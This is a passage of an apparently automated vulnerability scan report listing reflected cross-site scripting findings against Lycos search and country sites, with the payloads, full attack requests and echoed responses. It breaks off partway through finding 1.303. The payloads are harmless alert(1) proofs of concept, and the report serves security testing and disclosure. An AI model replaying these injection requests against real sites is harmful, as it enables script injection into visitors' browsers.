Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PARTNER=lycos50
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?src=LYCOS50&query=75975"><script>alert(1)</script>6c6e640c41d&diktfc=A3B554BD102E2D83F1395F90E8ACDF586D8AACE8DC18&mobile=1">
...[SNIP]...

1.289. http://search.lycos.com/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4774"><script>alert(1)</script>de363e9cc4d was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?src=LYCOS50f4774"><script>alert(1)</script>de363e9cc4d&query= HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:17 GMT; path=/
Set-Cookie: LYCOS_SEARCH=j2co10c00q05ao63t7a5jgm8e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PARTNER=lycos50f4774%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ede363e9cc4d
Set-Cookie: PARTNER=deleted; expires=Sun, 07-Feb-2010 15:24:16 GMT
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?src=LYCOS50f4774"><script>alert(1)</script>de363e9cc4d&query=&diktfc=761A6929C5442BEE59CAA6139134CCACAA19EB73D471&mobile=1">
...[SNIP]...

1.290. http://search.lycos.com/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c0d5"><script>alert(1)</script>7685ded7554 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?tab=web9c0d5"><script>alert(1)</script>7685ded7554 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:19 GMT; path=/
Set-Cookie: LYCOS_SEARCH=eace7dic8bq4v0e2qhi7rqe8v7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_web9c0d5"><script>alert(1)</script>7685ded7554&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.291. http://search.lycos.com/image/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43791"%3balert(1)//d9279e4be1f was submitted in the cat parameter. This input was echoed as 43791";alert(1)//d9279e4be1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /image/?tab=multi&cat=images43791"%3balert(1)//d9279e4be1f HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/
Set-Cookie: LYCOS_SEARCH=5m9teqd1e7d8kuou5aessesri1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_images43791";alert(1)//d9279e4be1f";
//-->
...[SNIP]...

1.292. http://search.lycos.com/image/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d400"><script>alert(1)</script>04436fbd937 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /image/?tab=multi&cat=images3d400"><script>alert(1)</script>04436fbd937 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:30 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ldvud0eepml0vstmc33qlqegp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images3d400"><script>alert(1)</script>04436fbd937&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.293. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81b13"><script>alert(1)</script>4decd24c467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /image/?81b13"><script>alert(1)</script>4decd24c467=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:27 GMT; path=/
Set-Cookie: LYCOS_SEARCH=en9m4qp7l5qdk9naigf89kr9b3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?81b13"><script>alert(1)</script>4decd24c467=1&diktfc=7CBE54719741B0F72BA55F284533AF4F1E949604FE02&mobile=1">
...[SNIP]...

1.294. http://search.lycos.com/image/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 647e3"><script>alert(1)</script>8c865f2d222 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /image/?tab=multi647e3"><script>alert(1)</script>8c865f2d222&cat=images HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/
Set-Cookie: LYCOS_SEARCH=r3tgvh6jeasitmtraofqqkd521; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi647e3"><script>alert(1)</script>8c865f2d222&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.295. http://search.lycos.com/video/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00d3"%3balert(1)//19c367855c0 was submitted in the cat parameter. This input was echoed as b00d3";alert(1)//19c367855c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/?tab=multi&cat=videob00d3"%3balert(1)//19c367855c0 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/
Set-Cookie: LYCOS_SEARCH=mv7t2v9cb7e6jmrr9uae88l2k1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_videob00d3";alert(1)//19c367855c0";
//-->
...[SNIP]...

1.296. http://search.lycos.com/video/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7022"><script>alert(1)</script>2066ac00765 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /video/?tab=multi&cat=videof7022"><script>alert(1)</script>2066ac00765 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/
Set-Cookie: LYCOS_SEARCH=5v26taejkg6hrvenn2penr4js5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_videof7022"><script>alert(1)</script>2066ac00765&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.297. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22399"><script>alert(1)</script>eb4d51ae47e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /video/?22399"><script>alert(1)</script>eb4d51ae47e=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/
Set-Cookie: LYCOS_SEARCH=d8jtk82lnbuvgpa2un328jp885; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?22399"><script>alert(1)</script>eb4d51ae47e=1&diktfc=CBA540D2A67B2A655A0D21D611F27D39EF126CA3CA03&mobile=1">
...[SNIP]...

1.298. http://search.lycos.com/video/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db38"><script>alert(1)</script>0bdbb3d2807 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /video/?tab=multi4db38"><script>alert(1)</script>0bdbb3d2807&cat=video HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:30 GMT; path=/
Set-Cookie: LYCOS_SEARCH=nbn9glms4m2vil1o58s7d03gg2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi4db38"><script>alert(1)</script>0bdbb3d2807&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.299. http://www.lycos.at/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.at
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e6bc"><script>alert(1)</script>617ee62cbd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?4e6bc"><script>alert(1)</script>617ee62cbd1=1 HTTP/1.1
Host: www.lycos.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161733398; path=/
Date: Mon, 07 Feb 2011 14:52:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:31 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="de">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?4e6bc"><script>alert(1)</script>617ee62cbd1=1&diktfc=89CB850B7B6CDECF10AF682AEDC184BAA8E73B509B27&mobile=1">
...[SNIP]...

1.300. http://www.lycos.at/ [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.at
Path:   /

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e56e6"><script>alert(1)</script>8888e131586 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome&utm_campaign=home_flagse56e6"><script>alert(1)</script>8888e131586&utm_medium=footer HTTP/1.1
Host: www.lycos.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161732309; path=/
Date: Mon, 07 Feb 2011 14:52:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="de">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome&utm_campaign=home_flagse56e6"><script>alert(1)</script>8888e131586&utm_medium=footer&diktfc=6B2BA67E858B385A8827A328762C53997CC7E7ECACC4&mobile=1">
...[SNIP]...

1.301. http://www.lycos.at/ [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.at
Path:   /

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19993"><script>alert(1)</script>ecba6dbeeb4 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer19993"><script>alert(1)</script>ecba6dbeeb4 HTTP/1.1
Host: www.lycos.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839806000; path=/
Date: Mon, 07 Feb 2011 14:52:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="de">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer19993"><script>alert(1)</script>ecba6dbeeb4&diktfc=ABF98913624707CA12A71CD65C0023955CF8862236F0&mobile=1">
...[SNIP]...

1.302. http://www.lycos.at/ [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.at
Path:   /

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7650e"><script>alert(1)</script>91f57f72591 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome7650e"><script>alert(1)</script>91f57f72591&utm_campaign=home_flags&utm_medium=footer HTTP/1.1
Host: www.lycos.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839809267; path=/
Date: Mon, 07 Feb 2011 14:52:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="de">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome7650e"><script>alert(1)</script>91f57f72591&utm_campaign=home_flags&utm_medium=footer&diktfc=D06EED63D740C9F1A7C6CD2B58B3ACE95D4FCCDBEF77&mobile=1">
...[SNIP]...

1.303. http://www.lycos.be/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.be
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ee9"><script>alert(1)</script>5cb537d5b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?c3ee9"><script>alert(1)</script>5cb537d5b45=1 HTTP/1.1
Host: www.lycos.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161732309; path=/
Date: Mon, 07 Feb 2011 14:52:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15501

